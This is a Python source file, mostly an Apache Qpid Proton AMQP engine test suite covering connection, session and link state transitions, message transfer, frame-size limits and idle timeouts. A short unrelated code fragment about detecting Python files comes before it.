        _, ext = os.path.splitext(self.filename)
        # Anything named *.py* should be Python.
        if ext.startswith('.py'):
            return True
        # A file with no extension should be Python.
        if not ext:
            return True
        # Everything else is probably not Python.
        return False
    def source_token_lines(self):
        """Return the tokenized source lines (via phystokens.source_token_lines)."""
        return source_token_lines(self.source())
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, common
from time import time, sleep
from proton import *
from common import pump
# future test areas
# + different permutations of setup
# - creating deliveries and calling input/output before opening the session/link
# + shrinking output_size down to something small? should the enginge buffer?
# + resuming
# - locally and remotely created deliveries with the same tag
# Default buffer size (bytes) used when pumping data between transports; see
# Test.pump below.
OUTPUT_SIZE = 10*1024
class Test(common.Test):
    """Base class for engine tests: builds in-memory connection/link pairs wired
    together through their transports."""
    def __init__(self, *args):
        common.Test.__init__(self, *args)
        # Each wire is a (connection1, transport1, connection2, transport2) tuple
        # whose transports are shuttled by pump().
        self._wires = []
    def connection(self):
        """Create two Connections bound to Transports, wire them together, and
        return the pair."""
        c1 = Connection()
        c2 = Connection()
        t1 = Transport()
        t1.bind(c1)
        c1._transport = t1
        t2 = Transport()
        t2.bind(c2)
        c2._transport = t2
        self._wires.append((c1, t1, c2, t2))
        mask1 = 0
        mask2 = 0
        # Honor PN_TRACE_FRM / PN_TRACE_RAW environment variables:
        # "1"/"2"/"yes"/"true" enables tracing on side one, "2" also on side two.
        for cat in ("TRACE_FRM", "TRACE_RAW"):
            trc = os.environ.get("PN_%s" % cat)
            if trc and trc.lower() in ("1", "2", "yes", "true"):
                mask1 = mask1 | getattr(Transport, cat)
            if trc == "2":
                mask2 = mask2 | getattr(Transport, cat)
        t1.trace(mask1)
        t2.trace(mask2)
        return c1, c2
    def link(self, name, max_frame=None, idle_timeout=None):
        """Open a connection and session pair and return (sender, receiver) links
        both named `name`. `max_frame` and `idle_timeout` are optional
        (side1, side2) tuples applied to the two transports."""
        c1, c2 = self.connection()
        if max_frame:
            c1._transport.max_frame_size = max_frame[0]
            c2._transport.max_frame_size = max_frame[1]
        if idle_timeout:
            # idle_timeout in seconds expressed as float
            c1._transport.idle_timeout = idle_timeout[0]
            c2._transport.idle_timeout = idle_timeout[1]
        c1.open()
        c2.open()
        ssn1 = c1.session()
        ssn1.open()
        self.pump()
        ssn2 = c2.session_head(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
        ssn2.open()
        self.pump()
        snd = ssn1.sender(name)
        rcv = ssn2.receiver(name)
        return snd, rcv
    def cleanup(self):
        # Nothing to release by default; subclasses call this from teardown().
        pass
    def pump(self, buffer_size=OUTPUT_SIZE):
        """Shuttle pending bytes across every wired transport pair."""
        for c1, t1, c2, t2 in self._wires:
            pump(t1, t2, buffer_size)
class ConnectionTest(Test):
    """Exercise connection-level open/close handshakes, capability exchange,
    error conditions, and property negotiation."""
    def setup(self):
        self.c1, self.c2 = self.connection()
    def teardown(self):
        self.cleanup()
    def test_open_close(self):
        """One side opens/closes first; the peer observes each half-state."""
        assert self.c1.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.c1.open()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
        self.c2.open()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.c1.close()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        self.c2.close()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert self.c2.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
    def test_simultaneous_open_close(self):
        """Both sides open and then close within the same pump cycle."""
        assert self.c1.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        assert self.c2.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.c1.open()
        self.c2.open()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.c1.close()
        self.c2.close()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert self.c2.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
    def test_capabilities(self):
        """Offered/desired capabilities set before open() reach the peer."""
        self.c1.offered_capabilities = Array(UNDESCRIBED, Data.SYMBOL,
                                             symbol("O_one"),
                                             symbol("O_two"),
                                             symbol("O_three"))
        self.c1.desired_capabilities = Array(UNDESCRIBED, Data.SYMBOL,
                                             symbol("D_one"),
                                             symbol("D_two"),
                                             symbol("D_three"))
        self.c1.open()
        # Nothing visible remotely until the wire is pumped.
        assert self.c2.remote_offered_capabilities is None
        assert self.c2.remote_desired_capabilities is None
        self.pump()
        assert self.c2.remote_offered_capabilities == self.c1.offered_capabilities, \
            (self.c2.remote_offered_capabilities, self.c1.offered_capabilities)
        assert self.c2.remote_desired_capabilities == self.c1.desired_capabilities, \
            (self.c2.remote_desired_capabilities, self.c1.desired_capabilities)
    def test_condition(self):
        """An error condition set before close() is delivered to the peer."""
        self.c1.open()
        self.c2.open()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
        self.c1.condition = cond
        self.c1.close()
        self.pump()
        assert self.c1.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.c2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        rcond = self.c2.remote_condition
        assert rcond == cond, (rcond, cond)
    def test_properties(self, p1={symbol("key"): symbol("value")}, p2=None):
        """Connection properties are exchanged on open; an unset map reads as None.
        (The dict default argument is evaluated once at class-definition time, but
        it is only read here, so the sharing is harmless.)"""
        self.c1.properties = p1
        self.c2.properties = p2
        self.c1.open()
        self.c2.open()
        self.pump()
        assert self.c2.remote_properties == p1, (self.c2.remote_properties, p1)
        # BUGFIX: the failure message previously printed self.c2.remote_properties
        # (copy-pasted from the line above) although the assertion is about self.c1.
        assert self.c1.remote_properties == p2, (self.c1.remote_properties, p2)
class SessionTest(Test):
    """Exercise session-level open/close handshakes and error conditions."""
    def setup(self):
        self.c1, self.c2 = self.connection()
        self.ssn = self.c1.session()
        self.c1.open()
        self.c2.open()
    def teardown(self):
        self.cleanup()
    def test_open_close(self):
        """Walk a session pair through every open/close state transition,
        checking both endpoints before and after each pump."""
        assert self.ssn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.ssn.open()
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        self.pump()
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
        assert ssn != None
        assert ssn.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        ssn.open()
        assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        self.pump()
        assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        ssn.close()
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.pump()
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        self.ssn.close()
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        self.pump()
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
    def test_simultaneous_close(self):
        """Both sessions close within the same pump cycle."""
        self.ssn.open()
        self.pump()
        ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
        assert ssn != None
        ssn.open()
        self.pump()
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.ssn.close()
        ssn.close()
        assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        self.pump()
        assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
    def test_closing_connection(self):
        """Closing the parent connection before the session must not break the
        subsequent session close."""
        self.ssn.open()
        self.pump()
        self.c1.close()
        self.pump()
        self.ssn.close()
        self.pump()
    def test_condition(self):
        """An error condition set before close() is delivered to the peer session."""
        self.ssn.open()
        self.pump()
        ssn = self.c2.session_head(Endpoint.REMOTE_ACTIVE | Endpoint.LOCAL_UNINIT)
        assert ssn != None
        ssn.open()
        self.pump()
        assert self.ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
        self.ssn.condition = cond
        self.ssn.close()
        self.pump()
        assert self.ssn.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert ssn.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        rcond = ssn.remote_condition
        assert rcond == cond, (rcond, cond)
class LinkTest(Test):
def setup(self):
self.snd, self.rcv = self.link("test-link")
def teardown(self):
self.cleanup()
    def test_open_close(self):
        """Walk a link pair through every open/close state transition, checking
        both endpoints before and after each pump."""
        assert self.snd.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.snd.open()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE
        self.rcv.open()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.snd.close()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        self.rcv.close()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
    def test_simultaneous_open_close(self):
        """Both links open and then close within the same pump cycle."""
        assert self.snd.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_UNINIT
        self.snd.open()
        self.rcv.open()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_UNINIT
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.snd.close()
        self.rcv.close()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
        self.pump()
        assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
        assert self.rcv.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_CLOSED
def test_multiple(self):
    """Open a second receiving link on the sender's session, mirror both
    half-open links on the peer connection, then tear everything down."""
    rcv = self.snd.session.receiver("second-rcv")
    assert rcv.name == "second-rcv"
    self.snd.open()
    rcv.open()
    self.pump()
    # walk the peer's links that are remotely active but not yet locally
    # opened, and open each of them
    c2 = self.rcv.session.connection
    l = c2.link_head(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
    while l:
        l.open()
        l = l.next(Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE)
    self.pump()
    assert self.snd
    assert rcv
    self.snd.close()
    rcv.close()
    # also close the enclosing session and connection
    ssn = rcv.session
    conn = ssn.connection
    ssn.close()
    conn.close()
    self.pump()
def test_closing_session(self):
    """Closing the session before the link must not prevent the link from
    being closed afterwards."""
    self.snd.open()
    self.rcv.open()
    ssn1 = self.snd.session
    self.pump()
    ssn1.close()
    self.pump()
    self.snd.close()
    self.pump()
def test_closing_connection(self):
    """Closing the connection before the link must not prevent the link
    from being closed afterwards."""
    self.snd.open()
    self.rcv.open()
    ssn1 = self.snd.session
    c1 = ssn1.connection
    self.pump()
    c1.close()
    self.pump()
    self.snd.close()
    self.pump()
def assertEqualTermini(self, t1, t2):
    """Assert that two termini are equivalent.

    Scalar attributes are compared directly; the Data-valued attributes
    (properties, capabilities, outcomes, filter) are compared via their
    format() rendering.
    """
    for name in ("type", "address", "durability", "expiry_policy",
                 "timeout", "dynamic"):
        v1 = getattr(t1, name)
        v2 = getattr(t2, name)
        assert v1 == v2, (v1, v2)
    for attr in ("properties", "capabilities", "outcomes", "filter"):
        d1 = getattr(t1, attr)
        d2 = getattr(t2, attr)
        assert d1.format() == d2.format(), (attr, d1.format(), d2.format())
def _test_source_target(self, config_source, config_target):
    """Drive one source/target negotiation.

    config_source/config_target are callables (e.g. TerminusConfig) that
    populate the sender's termini, or None to mark the terminus
    UNSPECIFIED.  After pumping, the receiver's remote termini must equal
    the sender's local ones; the receiver then copies them back and the
    sender's remote view must match as well.
    """
    if config_source is None:
        self.snd.source.type = Terminus.UNSPECIFIED
    else:
        config_source(self.snd.source)
    if config_target is None:
        self.snd.target.type = Terminus.UNSPECIFIED
    else:
        config_target(self.snd.target)
    self.snd.open()
    self.pump()
    self.assertEqualTermini(self.rcv.remote_source, self.snd.source)
    self.assertEqualTermini(self.rcv.remote_target, self.snd.target)
    # echo the remotely offered termini back as our local ones
    self.rcv.target.copy(self.rcv.remote_target)
    self.rcv.source.copy(self.rcv.remote_source)
    self.rcv.open()
    self.pump()
    self.assertEqualTermini(self.snd.remote_target, self.snd.target)
    self.assertEqualTermini(self.snd.remote_source, self.snd.source)
def test_source_target(self):
    """Both a configured source and a configured target should propagate."""
    src = TerminusConfig(address="source")
    tgt = TerminusConfig(address="target")
    self._test_source_target(src, tgt)
def test_source(self):
    """A source-only configuration leaves the target unspecified."""
    src = TerminusConfig(address="source")
    self._test_source_target(src, None)
def test_target(self):
    """A target-only configuration leaves the source unspecified."""
    tgt = TerminusConfig(address="target")
    self._test_source_target(None, tgt)
def test_source_target_full(self):
    """Exercise a fully populated source terminus (timeout, distribution
    mode, filter, capabilities) against a simpler target."""
    self._test_source_target(TerminusConfig(address="source",
                                            timeout=3,
                                            dist_mode=Terminus.DIST_MODE_MOVE,
                                            filter=[("int", 1), ("symbol", "two"), ("string", "three")],
                                            capabilities=["one", "two", "three"]),
                             TerminusConfig(address="source",
                                            timeout=7,
                                            capabilities=[]))
def test_distribution_mode(self):
    """The source's distribution mode propagates; a target configured
    without one reports DIST_MODE_UNSPECIFIED."""
    self._test_source_target(TerminusConfig(address="source",
                                            dist_mode=Terminus.DIST_MODE_COPY),
                             TerminusConfig(address="target"))
    assert self.rcv.remote_source.distribution_mode == Terminus.DIST_MODE_COPY
    assert self.rcv.remote_target.distribution_mode == Terminus.DIST_MODE_UNSPECIFIED
def test_dynamic_link(self):
    """A dynamic source with no address arrives as dynamic and unnamed."""
    self._test_source_target(TerminusConfig(address=None, dynamic=True), None)
    assert self.rcv.remote_source.dynamic
    assert self.rcv.remote_source.address is None
def test_condition(self):
    """An error condition set before close must be visible to the peer as
    its remote_condition once the close propagates."""
    self.snd.open()
    self.rcv.open()
    self.pump()
    assert self.snd.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
    assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
    cond = Condition("blah:bleh", "this is a description", {symbol("foo"): "bar"})
    self.snd.condition = cond
    self.snd.close()
    self.pump()
    assert self.snd.state == Endpoint.LOCAL_CLOSED | Endpoint.REMOTE_ACTIVE
    assert self.rcv.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
    rcond = self.rcv.remote_condition
    assert rcond == cond, (rcond, cond)
def test_settle_mode(self):
    """Locally configured settle modes become visible remotely only after
    the open frames have been exchanged."""
    self.snd.snd_settle_mode = Link.SND_UNSETTLED
    assert self.snd.snd_settle_mode == Link.SND_UNSETTLED
    self.rcv.rcv_settle_mode = Link.RCV_SECOND
    assert self.rcv.rcv_settle_mode == Link.RCV_SECOND
    # nothing negotiated yet, so the remote views must still differ
    assert self.snd.remote_rcv_settle_mode != Link.RCV_SECOND
    assert self.rcv.remote_snd_settle_mode != Link.SND_UNSETTLED
    self.snd.open()
    self.rcv.open()
    self.pump()
    assert self.snd.remote_rcv_settle_mode == Link.RCV_SECOND
    assert self.rcv.remote_snd_settle_mode == Link.SND_UNSETTLED
class TerminusConfig:
    """Reusable terminus configuration.

    An instance records the desired terminus settings; calling it with a
    terminus object applies every setting that was actually supplied
    (None means "leave untouched"; dynamic defaults to False).
    """

    def __init__(self, address=None, timeout=None, durability=None, filter=None,
                 capabilities=None, dynamic=False, dist_mode=None):
        self.address = address
        self.timeout = timeout
        self.durability = durability
        self.filter = filter
        self.capabilities = capabilities
        self.dynamic = dynamic
        self.dist_mode = dist_mode

    def __call__(self, terminus):
        """Copy all configured settings onto *terminus*."""
        # simple scalar attributes: only set the ones that were supplied
        for attr in ("address", "timeout", "durability"):
            value = getattr(self, attr)
            if value is not None:
                setattr(terminus, attr, value)
        if self.capabilities is not None:
            # capabilities are encoded as an array of symbols
            caps = terminus.capabilities
            caps.put_array(False, Data.SYMBOL)
            caps.enter()
            for cap in self.capabilities:
                caps.put_symbol(cap)
        if self.filter is not None:
            # each filter entry is a (type-name, value) pair dispatched to
            # the matching put_<type-name> encoder on the Data object
            flt = terminus.filter
            flt.put_list()
            flt.enter()
            for type_name, value in self.filter:
                getattr(flt, "put_%s" % type_name)(value)
        if self.dynamic:
            terminus.dynamic = True
        if self.dist_mode is not None:
            terminus.distribution_mode = self.dist_mode
class TransferTest(Test):
    """Tests for moving payloads and dispositions across an open link."""

    def setup(self):
        # one sender/receiver pair over a pumped in-memory connection pair
        self.snd, self.rcv = self.link("test-link")
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()

    def teardown(self):
        self.cleanup()

    def test_work_queue(self):
        """A delivery appears on the connection work queue only once it is
        actionable (writable with credit, or readable with payload)."""
        assert self.c1.work_head is None
        self.snd.delivery("tag")
        # no credit granted yet, so the delivery is not yet workable
        assert self.c1.work_head is None
        self.rcv.flow(1)
        self.pump()
        d = self.c1.work_head
        assert d is not None
        tag = d.tag
        assert tag == "tag", tag
        assert d.writable
        n = self.snd.send("this is a test")
        assert self.snd.advance()
        # advancing past the delivery removes it from the sender's work queue
        assert self.c1.work_head is None
        self.pump()
        d = self.c2.work_head
        assert d.tag == "tag"
        assert d.readable

    def test_multiframe(self):
        """A delivery's payload may arrive in several chunks; recv returns
        "" when caught up and None once the delivery is complete."""
        self.rcv.flow(1)
        self.snd.delivery("tag")
        msg = "this is a test"
        n = self.snd.send(msg)
        assert n == len(msg)
        self.pump()
        d = self.rcv.current
        assert d
        assert d.tag == "tag", repr(d.tag)
        assert d.readable
        bytes = self.rcv.recv(1024)
        assert bytes == msg
        bytes = self.rcv.recv(1024)
        # "" means no data currently available but the delivery is not done
        assert bytes == ""
        msg = "this is more"
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        bytes = self.rcv.recv(1024)
        assert bytes == msg, (bytes, msg)
        bytes = self.rcv.recv(1024)
        # None signals the delivery has been fully received
        assert bytes is None

    def test_disposition(self):
        """Disposition updates flow both directions and settle cleanly."""
        self.rcv.flow(1)
        self.pump()
        sd = self.snd.delivery("tag")
        msg = "this is a test"
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        rd = self.rcv.current
        assert rd is not None
        assert rd.tag == sd.tag
        rmsg = self.rcv.recv(1024)
        assert rmsg == msg
        rd.update(Delivery.ACCEPTED)
        self.pump()
        # the receiver's local state becomes the sender's remote state
        rdisp = sd.remote_state
        ldisp = rd.local_state
        assert rdisp == ldisp == Delivery.ACCEPTED, (rdisp, ldisp)
        assert sd.updated
        sd.update(Delivery.ACCEPTED)
        sd.settle()
        self.pump()
        assert sd.local_state == rd.remote_state == Delivery.ACCEPTED

    def test_delivery_id_ordering(self):
        """Settle a full window of deliveries, then interleave new
        submissions with disposition handling, and verify everything still
        arrives in tag order."""
        self.rcv.flow(1024)
        self.pump(buffer_size=64*1024)
        #fill up delivery buffer on sender
        for m in range(1024):
            sd = self.snd.delivery("tag%s" % m)
            msg = "message %s" % m
            n = self.snd.send(msg)
            assert n == len(msg)
            assert self.snd.advance()
        self.pump(buffer_size=64*1024)
        #receive a session-windows worth of messages and accept them
        for m in range(1024):
            rd = self.rcv.current
            assert rd is not None, m
            assert rd.tag == ("tag%s" % m), (rd.tag, m)
            msg = self.rcv.recv(1024)
            assert msg == ("message %s" % m), (msg, m)
            rd.update(Delivery.ACCEPTED)
            rd.settle()
        self.pump(buffer_size=64*1024)
        #add some new deliveries
        for m in range(1024, 1450):
            sd = self.snd.delivery("tag%s" % m)
            msg = "message %s" % m
            n = self.snd.send(msg)
            assert n == len(msg)
            assert self.snd.advance()
        #handle all disposition changes to sent messages
        d = self.c1.work_head
        while d:
            if d.updated:
                d.update(Delivery.ACCEPTED)
                d.settle()
            d = d.work_next
        #submit some more deliveries
        for m in range(1450, 1500):
            sd = self.snd.delivery("tag%s" % m)
            msg = "message %s" % m
            n = self.snd.send(msg)
            assert n == len(msg)
            assert self.snd.advance()
        self.pump(buffer_size=64*1024)
        self.rcv.flow(1024)
        self.pump(buffer_size=64*1024)
        #verify remaining messages can be received and accepted
        for m in range(1024, 1500):
            rd = self.rcv.current
            assert rd is not None, m
            assert rd.tag == ("tag%s" % m), (rd.tag, m)
            msg = self.rcv.recv(1024)
            assert msg == ("message %s" % m), (msg, m)
            rd.update(Delivery.ACCEPTED)
            rd.settle()
class MaxFrameTransferTest(Test):
    """Transfers constrained by the negotiated max-frame-size."""

    def setup(self):
        pass

    def teardown(self):
        self.cleanup()

    def message(self, size):
        """Build a deterministic payload of exactly *size* characters."""
        parts = []
        for i in range(size):
            parts.append(str(i))
        return "/".join(parts)[:size]

    def testMinFrame(self):
        """
        Configure receiver to support minimum max-frame as defined by AMQP-1.0.
        Verify transfer of messages larger than 512.
        """
        self.snd, self.rcv = self.link("test-link", max_frame=[0,512])
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()
        # the receiver advertises 512; the sender must observe it remotely
        assert self.rcv.session.connection._transport.max_frame_size == 512
        assert self.snd.session.connection._transport.remote_max_frame_size == 512
        self.rcv.flow(1)
        self.snd.delivery("tag")
        msg = self.message(513)
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        bytes = self.rcv.recv(513)
        assert bytes == msg
        bytes = self.rcv.recv(1024)
        assert bytes == None

    def testOddFrame(self):
        """
        Test an odd sized max limit with data that will require multiple frames to
        be transferred.
        """
        self.snd, self.rcv = self.link("test-link", max_frame=[0,521])
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()
        assert self.rcv.session.connection._transport.max_frame_size == 521
        assert self.snd.session.connection._transport.remote_max_frame_size == 521
        self.rcv.flow(2)
        self.snd.delivery("tag")
        # 1699 bytes will not fit in a single 521-byte frame
        msg = "X" * 1699
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        bytes = self.rcv.recv(1699)
        assert bytes == msg
        bytes = self.rcv.recv(1024)
        assert bytes == None
        self.rcv.advance()
        # second delivery with a generated (non-repeating) payload
        self.snd.delivery("gat")
        msg = self.message(1426)
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        bytes = self.rcv.recv(1426)
        assert bytes == msg
        self.pump()
        bytes = self.rcv.recv(1024)
        assert bytes == None

    def testBigMessage(self):
        """
        Test transferring a big message.
        """
        self.snd, self.rcv = self.link("test-link")
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()
        self.rcv.flow(2)
        self.snd.delivery("tag")
        msg = self.message(1024*256)
        n = self.snd.send(msg)
        assert n == len(msg)
        assert self.snd.advance()
        self.pump()
        bytes = self.rcv.recv(1024*256)
        assert bytes == msg
        bytes = self.rcv.recv(1024)
        assert bytes == None
class IdleTimeoutTest(Test):
    """Negotiation and enforcement of the AMQP idle timeout via tick()."""

    def setup(self):
        pass

    def teardown(self):
        self.cleanup()

    def message(self, size):
        """Build a deterministic payload of exactly *size* characters."""
        parts = []
        for i in range(size):
            parts.append(str(i))
        return "/".join(parts)[:size]

    def testGetSet(self):
        """
        Verify the configuration and negotiation of the idle timeout.
        """
        self.snd, self.rcv = self.link("test-link", idle_timeout=[1.0,2.0])
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()
        # each side sees its own configured value locally and the peer's
        # value as the remote timeout
        assert self.rcv.session.connection._transport.idle_timeout == 2.0
        assert self.rcv.session.connection._transport.remote_idle_timeout == 1.0
        assert self.snd.session.connection._transport.idle_timeout == 1.0
        assert self.snd.session.connection._transport.remote_idle_timeout == 2.0

    def testTimeout(self):
        """
        Verify the AMQP Connection idle timeout.
        """
        # snd will timeout the Connection if no frame is received within 1000 ticks
        self.snd, self.rcv = self.link("test-link", idle_timeout=[1.0,0])
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()
        t_snd = self.snd.session.connection._transport
        t_rcv = self.rcv.session.connection._transport
        assert t_rcv.idle_timeout == 0.0
        assert t_rcv.remote_idle_timeout == 1.0
        assert t_snd.idle_timeout == 1.0
        assert t_snd.remote_idle_timeout == 0.0
        sndr_frames_in = t_snd.frames_input
        rcvr_frames_out = t_rcv.frames_output
        # at t+1msec, nothing should happen:
        clock = 0.001
        assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
        assert t_rcv.tick(clock) == 0.501, "deadline to send keepalive"
        self.pump()
        assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
        # at one tick from expected idle frame send, nothing should happen:
        clock = 0.500
        assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
